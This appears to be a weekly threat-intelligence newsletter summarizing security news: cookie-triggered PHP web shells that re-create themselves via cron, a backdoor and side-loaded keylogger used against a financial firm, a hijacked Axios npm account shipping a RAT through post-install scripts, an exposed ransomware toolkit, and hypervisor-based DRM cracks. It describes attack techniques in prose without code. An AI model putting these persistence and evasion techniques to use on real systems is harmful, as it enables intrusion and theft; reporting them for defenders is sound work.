In this week’s roundup, we cover Microsoft's detailed breakdown of cookie-controlled PHP web shells using cron jobs to self-heal on Linux servers after cleanup, a custom two-piece malware toolkit targeting a South Asian financial firm combining a modular backdoor with a keystroke-capturing DLL, North Korea-linked threat actors hijacking the Axios npm account to push RAT malware across millions of downstream projects, a misconfigured server exposing the complete operational toolkit of a TheGentlemen ransomware affiliate including victim credentials and pre-encryption scripts, and a game piracy technique weaponizing hypervisor technology to crack Denuvo DRM while stripping away the core Windows security protections that keep servers and infrastructure safe. Read on!
Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers
Microsoft's Defender Security Research Team has pulled back the curtain on a particularly cunning class of PHP-based web shells targeting Linux servers, where threat actors have abandoned the obvious approach of hiding commands in URL parameters and instead buried execution logic inside HTTP cookie values, allowing the malware to sit completely dormant during normal traffic and spring to life only when a specific cookie is present, while simultaneously using cron jobs to recreate the PHP loader automatically after cleanup so that even successful remediation efforts are quietly undone in the background, creating a self-healing persistence mechanism that separates the re-creation function from the execution trigger to minimize observable indicators and blend seamlessly into routine application logs.
"Ransomware doesn't start with encryption. Threat actors go to great lengths to set up their ransomware before it detonates. These steps often involve disabling security software, shutting down applications, and tampering with recovery capabilities."
On Exposed Server Reveals TheGentlemen Ransomware Toolkit, Victim Credentials, and Ngrok Tokens
Hackers Target South Asian Financial Firm with BRUSHWORM and BRUSHLOGGER Attacks
Researchers investigating a breach at a South Asian financial institution uncovered a custom two-piece malware toolkit built by what appears to be an inexperienced but actively developing threat actor — BRUSHWORM, a modular backdoor disguised as paint.exe that handles persistence, C2, USB-based worm propagation, and bulk theft of documents, spreadsheets, email archives, and source code, paired with BRUSHLOGGER, a DLL side-loaded keylogger masquerading as libcurl.dll that captures system-wide keystrokes with per-window context and timestamps before XOR encrypting the logs with a static key.
Attackers Hijack Axios npm Account to Spread RAT Malware
When threat actors compromised the npm maintainer account behind Axios, one of the most widely used JavaScript libraries on the planet with over 400 million monthly downloads, they published two malicious versions within an hour, injecting a hidden dependency called plain-crypto-js that deployed a cross-platform remote access trojan across macOS, Windows, and Linux, used obfuscation to stay hidden, ran automatically via post-install scripts, deleted its own traces to make the infected library appear clean, and quietly communicated with a command and control server before security researchers caught the rogue updates.
Exposed Server Reveals TheGentlemen Ransomware Toolkit, Victim Credentials, and Ngrok Tokens
Hunt.io researchers stumbled onto something rare when a misconfigured server hosted on Russian bulletproof hosting provider Proton66 left the complete operational toolkit of a TheGentlemen ransomware affiliate sitting wide open and unauthenticated for at least 24 days, exposing 126 files across 18 subdirectories including harvested victim credentials, plaintext ngrok authentication tokens, Mimikatz credential dump logs, and the crown jewel of the entire directory, a 35-kilobyte batch script called z1.bat that consolidates every pre-encryption preparation step into a single execution, systematically killing security tools from over a dozen vendors including Sophos, Kaspersky, and ESET.
Cracking Denuvo games in Windows just got easier—and Insanely Dangerous
Game pirates looking to crack Denuvo DRM have stumbled onto something that security professionals have long warned about, deploying hypervisor technology that runs beneath the Windows operating system to intercept CPU instructions directly and bypass the encrypted server handshakes Denuvo depends on, but in doing so they are forcing users to disable Secure Boot and strip away core Windows protections, creating exactly the kind of below-OS attack surface that ransomware operators and threat actors actively exploit, and the irony is striking enough that even members of the piracy community are publicly refusing to use the techniques out of fear of the vulnerabilities they introduce at the hypervisor layer.
.png?upscale=true&width=1120&upscale=true&name=Copy%20of%20WTR%20Newsletter%20Email%20Header%20(15).png)
